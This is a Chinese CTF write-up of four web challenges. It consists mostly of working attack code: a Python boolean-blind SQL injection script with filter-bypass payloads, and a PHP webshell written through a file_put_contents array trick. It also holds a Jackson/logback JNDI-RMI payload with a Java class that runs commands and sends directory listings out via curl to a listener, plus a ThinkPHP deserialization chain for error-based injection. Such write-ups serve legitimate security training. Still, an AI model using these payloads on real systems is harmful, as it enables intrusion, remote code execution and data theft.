web
happysql
测了一波,发现有黑名单
过滤了 or sleep ' 等等 417的都是被过滤的
用|| 代替or /**/代替空格
发现闭合方式
发现过滤substr,mid,发现可以用left,right
用集合的方式进行布尔盲注
"||"1"in/**/(left(database(),1))#
库名 ctf 由于过滤or,需要绕过information
发现这个能用
mysql.innodb_table_stats
"||"1"/**/in/**/(right(left((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),1),1))#
表名如下 ctf f1ag gtid slave poss
得到f1ag的表名
根据上述文章
采用select * from f1ag 获取f1ag所有的字段值
"||"f"/**/in/**/(right(left((select/**/*/**/from/**/f1ag),1),1))#
这里有个坑
他把-给过滤了,动态靶机懂得都懂 就是python 的uuid,flag肯定有-
所以记得做下处理
总的exp如下
# -*- coding: utf-8 -*-
# @File : sql
# @Author : penson <[email protected]>
# @Email: [email protected]
# @Date : 2021/4/2 10:59
import string
import requests
import os
def sqlinjet(url,payload):
    """Drive the boolean-blind injection described in the notes above.

    For each position ``i`` in 1..99 and each candidate character ``j``,
    POST ``payload.format(j, i)`` as ``username`` to ``url`` and use the
    response body as the oracle:

    * ``'url=home.php'`` in the body -> the injected condition was true, so
      ``j`` is the i-th character; it is appended and the inner loop breaks.
    * ``"SQL injection detected!"`` in the body -> the blacklist fired on the
      probe.  ``j`` is appended anyway and the loop is NOT broken.  Because
      ``'-'`` is the last candidate and (per the notes above) ``-`` is
      blacklisted, this is how the dashes of a UUID-shaped flag are
      recovered: if no earlier candidate matched, the blocked ``-`` probe is
      the only one left.  NOTE(review): any other blacklisted candidate would
      be appended the same way, so the heuristic relies on ``-`` being the
      only filtered character in the candidate set.

    ``url`` is the login endpoint; ``payload`` must contain two ``{}``
    placeholders (character first, position second).  Every probe and every
    partial result is printed.  Calls ``os._exit(0)`` once ``flag`` is longer
    than 42 characters; otherwise returns ``None`` after position 99.

    Monitoring note: each extracted character costs up to ~65 POSTs whose
    ``username`` contains ``||`` and ``/**/``; a rate or pattern alert on the
    login form catches this early.
    """
    # Static browser-like headers; the cookie values are analytics cookies
    # copied from a browser session and are not needed by the oracle.
    header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
        'Cookie': "UM_distinctid = 175b18dcb384ba-0f290792fb4f06-230346d-144000-175b18dcb39493;CNZZDATA1261218610 =1200642698-1605001662-%7C1605366994",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    flag=''
    # Candidate alphabet; '-' must stay LAST (see the docstring).
    # NOTE(review): this shadows the builtin ``str`` for the rest of the function.
    str = string.ascii_letters + string.digits +'{'+'}'+ '-'
    for i in range(1,100):
        for j in str:
            data = {
                'username': payload.format(j,i),
                'password': "123",
            }
            print(data['username'])
            # allow_redirects=False keeps the login response itself; the
            # success marker is matched in its body, not in a followed page.
            r = requests.post(url=url,data=data,headers=header,allow_redirects=False)
            if "SQL injection detected!" in r.text:
                # Blacklist hit: append without breaking (the '-' case).
                flag+=j
                print(flag)
            if 'url=home.php' in r.text:
                # Condition true: j is the character at position i.
                flag+=j
                print(flag)
                break
        # 42 = len('flag{') + 36-char UUID + len('}'), presumably — the flag
        # format itself is not visible here.
        if len(flag)>42:
            os._exit(0)
if __name__ == '__main__':
    # Login endpoint of the challenge instance (instance-specific hostname).
    url="http://eci-2zegxwtddgwfx2ytn8qh.cloudeci1.ichunqiu.com/login.php"
    # Payload templates: the first {} receives the candidate character, the
    # second the position i; right(left(<expr>, i), 1) selects the i-th
    # character of <expr> without substr/mid, which the notes say are filtered.
    payload_flag='"||\"{}\"/**/in/**/(right(left((select/**/*/**/from/**/f1ag),{}),1))#'
    payload_database = '"||\"{}\"/**/in/**/(right(left((select/**/database()),{}),1))#'
    payload_table='"||\"{}\"/**/in/**/(right(left((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),{}),1))#'
    # Only the flag template is run here; payload_database and payload_table
    # are defined but unused in this invocation.
    sqlinjet(url,payload_flag)
write_shell
这里关键是利用file_put_contents()
第二个参数可以传递数组
写个phpinfo
?action=upload&data[]=<?=&data[]=ph&data[]=p&data[]=info()&data[]=?>
禁了函数
尝试二次编码绕过
data[]=<?&data[]=eva&data[]=l(urldecode("%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2570%2565%256e%2573%256f%256e%255d%2529%253b"))?>
这段payload我在本地试出来了,估计是版本原因 发现7.2以下这个payload就没得用了
尝试用<?php包裹
发现成功了
蚁剑连接即可
javaweb
访问login,发现要访问json,访问后也没啥结果
POST提交点东西上去
发现shiro的东西,搜一波最新的漏洞
提交个json上去
发现返回了json字符串,比赛中能看到jackson
拿那个payload打一波试试
https://www.zhihuifly.com/t/topic/540
和fastjson差不多,先开启rmi和ldap服务
poc
package com.by.rmi;
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class ExportObject {
    /**
     * Runs a local command when the class is instantiated and carries the
     * command's stdout out as the message of the thrown Exception.
     *
     * In the writeup this class is served over HTTP and referenced by the
     * marshalsec RMIRefServer, so instantiation happens on whichever JVM
     * resolves the JNDI reference (here: the application that deserialises
     * the JSON payload).  The command is a macOS-only "open Calculator" --
     * a visible proof of execution, nothing more.
     *
     * Defender notes: this is remote class loading through a JNDI/RMI
     * reference; JDKs since 8u121 refuse it by default
     * (com.sun.jndi.rmi.object.trustURLCodebase=false), and an outbound
     * RMI/LDAP connection from an application server to an unknown host is
     * a strong detection signal.
     *
     * @throws Exception always -- the message is the command output.
     */
    public ExportObject() throws Exception {
        Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");
        // Collect the process's stdout line by line.
        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();
        String line;
        while((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }
        String result = sb.toString();
        // The captured output travels back in the exception message.
        Exception e = new Exception(result);
        throw e;
    }

    /** Local test entry point: instantiating the class runs the command. */
    public static void main(String[] args) throws Exception {
        ExportObject e = new ExportObject();
    }
}
javac编译成class
python3 -m http.server --bind 0.0.0.0 8000
rjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:8000/#ExportObject
payload
["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://47.96.31.86:1099/Exploit"}]
发现可行
改下脚本直接弹shell
但是看了赵总的文章他说比赛的时候靶机弹shell弹不了,他是尝试外带
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class ExportObject {
    /**
     * Out-of-band variant of the class above: instead of opening a local
     * application it runs a bash one-liner that sends the base64 of
     * "ls /" in the path of an HTTP request to ip:port (placeholders for
     * the listener).  The writeup uses this because a reverse shell from
     * the target was reported not to work.
     *
     * Defender notes: the request only succeeds if the application server
     * can reach arbitrary external hosts -- egress allow-listing defeats
     * it -- and a base64 blob in a URL path from a server process is a
     * recognisable indicator in proxy logs.
     *
     * @throws Exception always -- the message is the command output.
     */
    public ExportObject() throws Exception {
        Process proc = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","curl http://ip:port/`ls /|base64`"});
        // Collect the process's stdout line by line.
        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();
        String line;
        while((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }
        String result = sb.toString();
        // The captured output travels back in the exception message.
        Exception e = new Exception(result);
        throw e;
    }

    /** Local test entry point: instantiating the class runs the command. */
    public static void main(String[] args) throws Exception {
        ExportObject e = new ExportObject();
    }
}
easytp
www.zip分析源码
找到控制器
Application/Home/Controller/IndexController.class.php
搜索一波该版本的反序列化利用链
这里需要知道数据库的密码
试一试就可以了密码是root(比赛是123456)
<?php
// Generator for the ThinkPHP deserialization chain used in the writeup.
// Each class below mirrors the name, namespace and property names of the
// framework class so that unserialize() on the target rebuilds them; the
// real behaviour (which method fires on destruct/wakeup and ends up issuing
// the query) lives in the framework and is not visible here.
// Chain as constructed: Imagick -> Memcache -> Model -> Mysql.
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // must be enabled to read files
            // NOTE(review): LOCAL INFILE is only relevant for a file-read
            // variant; the query below is error-based and does not use it.
            // Disabling LOCAL INFILE on the server/client removes that option.
        );
        // Connection settings the driver will use; the password has to match
        // the target's (the notes say root locally, 123456 in the contest).
        protected $config = array(
            "debug" => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset" => "utf8",
            "username" => "root",
            "password" => "root"
        );
    }
}
namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    // Entry object of the chain; its $img is the next link.
    class Imagick{
        private $img;
        public function __construct(){
            $this->img = new Memcache();
        }
    }
}
namespace Think\Session\Driver{
    use Think\Model;
    // $handle is what the session driver presumably calls into on teardown.
    class Memcache{
        protected $handle;
        public function __construct(){
            $this->handle = new Model();
        }
    }
}
namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;
        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            // The "table" value is concatenated unescaped into the query
            // (per the notes: 报错注入 / error-based); updatexml(1,user(),1)
            // makes the server echo user() in the error message.
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            );
        }
    }
}
namespace {
    // Serialize the chain and base64 it for transport in the request.
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}
报错注入
发现有个test,进一步查询flag在这个库里
常规报错注入即可